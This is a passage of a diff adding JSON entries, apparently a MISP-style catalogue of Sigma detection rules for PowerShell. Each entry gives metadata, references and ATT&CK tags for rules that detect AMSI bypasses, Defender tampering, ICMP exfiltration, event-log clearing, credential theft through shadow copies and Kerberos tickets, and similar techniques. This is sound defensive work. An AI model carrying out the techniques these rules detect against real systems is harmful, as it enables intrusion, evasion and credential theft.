Investigate alerts to determine if the action is benign" + ], + "filename": "posh_ps_susp_write_eventlog.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "value": "PowerShell Write-EventLog Usage" + }, + { + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_adrecon_execution.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "value": "PowerShell ADRecon Execution" + }, + { + "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_gpo.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + 
"https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ] + }, + "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", + "value": "Suspicious GPO Discovery With Get-GPO" + }, + { + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_localuser.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "value": "Powershell LocalAccount Manipulation" + }, + { + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. 
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "meta": { + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Legitimate usage of System.Net.NetworkInformation.Ping class" + ], + "filename": "posh_ps_icmp_exfiltration.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "value": "PowerShell ICMP Exfiltration" + }, + { + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "meta": { + "author": "Alina Stepchenkova, Group-IB, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_apt_silence_eda.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" + ] + }, + "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "value": "Silence.EDA Detection" + }, + { + "description": "Adversaries may communicate using a protocol and port paring that are typically not 
associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_test_netconnection.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ] + }, + "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "value": "Testing Usage of Uncommonly Used Port" + }, + { + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate administration scripts" + ], + "filename": "posh_ps_hotfix_enum.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", + "value": "PowerShell Hotfix Enumeration" + }, + { + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows 
defender atp or set default actions to allow.", + "meta": { + "author": "frack113, elhoim", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_tamper_defender.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "value": "Tamper Windows Defender - ScriptBlockLogging" + }, + { + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_wallpaper.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" + ], + "tags": [ + "attack.impact", + "attack.t1491.001" + ] + }, + "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "value": "Replace Desktop Wallpaper by Powershell" + }, + { + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI 
functionalities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_amsi_null_bits_bypass.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "value": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging" + }, + { + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/09/21", + "falsepositive": [ + "Diagnostics" + ], + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" + ], + "tags": [ + "attack.t1003" + ] + }, + "uuid": "cd185561-4760-45d6-a63e-a51325112cae", + "value": "Live Memory Dump Using Powershell" + }, + { + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", + "meta": { + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (update)", + "creation_date": "2022/12/23", + "falsepositive": [ + "Legitimate use of the library for administrative activity" + ], + "filename": "posh_ps_aadinternals_cmdlets_execution.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Gerenios/AADInternals", + "https://o365blog.com/aadinternals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" + ] + }, + "uuid": "91e69562-2426-42ce-a647-711b8152ced6", + "value": "AADInternals PowerShell Cmdlets Execution - PsScript" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" + }, + { + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_new_psdrive.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "value": "Suspicious New-PSDrive to Admin Share" + }, + { + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_request_kerberos_ticket.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", + "value": "Request A Single Ticket via PowerShell" + }, + { + "description": 
"Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "meta": { + "author": "Sami Ruohonen", + "creation_date": "2018/07/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_ntfs_ads_access.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "http://www.powertheshell.com/ntfsstreams/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", + "value": "NTFS Alternate Data Stream" + }, + { + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_as_rep_roasting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", + "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "value": "Get-ADUser Enumeration Using UserAccountControl Flags" + }, + { + "description": "Adversaries may abuse the Windows Task 
Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cmdlet_scheduled_task.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", + "value": "Powershell Create Scheduled Task" + }, + { + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/08/03", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "posh_ps_timestomp.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", + 
"value": "Powershell Timestomp" + }, + { + "description": "Detects the use of PSAttack PowerShell hack tool", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_psattack.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "value": "PowerShell PSAttack" + }, + { + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "meta": { + "author": "frack113", + "creation_date": "2022/04/09", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_hyper_v_condlet.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006" + ] + }, + "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "value": "Suspicious Hyper-V Cmdlets" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service 
start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_get_acl_service.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ] + }, + "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "value": "Service Registry Permissions Weakness Check" + }, + { + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_create_volume_shadow_copy.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://attack.mitre.org/datasources/DS0005/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "value": "Create Volume Shadow Copy with Powershell" + }, + { + "description": 
"Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_enable_psremoting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "value": "Enable Windows Remote Management" + }, + { + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Legitimate usage of the cmdlet to forward emails" + ], + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "value": "Suspicious PowerShell Mailbox SMTP Forward Rule" + }, + { + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event 
logs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/12", + "falsepositive": [ + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + ], + "filename": "posh_ps_susp_clear_eventlog.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://twitter.com/oroneequalsone/status/1568432028361830402", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ] + }, + "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "value": "Suspicious Eventlog Clear" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_smb_share_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + 
"uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "value": "Suspicious Get Information for SMB Share" + }, + { + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "meta": { + "author": "frack113", + "creation_date": "2022/12/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_frombase64string_archive.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml" + ], + "tags": "No established tags" + }, + "uuid": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "value": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script" + }, + { + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_shellintel_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Shellntel/scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "value": "Malicious ShellIntel PowerShell Commandlets" + }, + { + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + 
"filename": "posh_ps_wmi_unquoted_service_search.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "value": "WMIC Unquoted Services Path Lookup - PowerShell" + }, + { + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ] + }, + "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "value": "AMSI Bypass Pattern Assembly GetType" + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": 
"posh_ps_run_from_mount_diskimage.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", + "value": "Suspicious Invoke-Item From Mount-DiskImage" + }, + { + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_mail_acces.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" + 